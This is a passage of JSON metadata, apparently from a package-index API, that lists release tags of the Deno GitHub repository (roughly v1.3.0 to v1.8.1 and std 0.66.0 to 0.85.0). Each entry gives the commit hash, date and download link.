.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno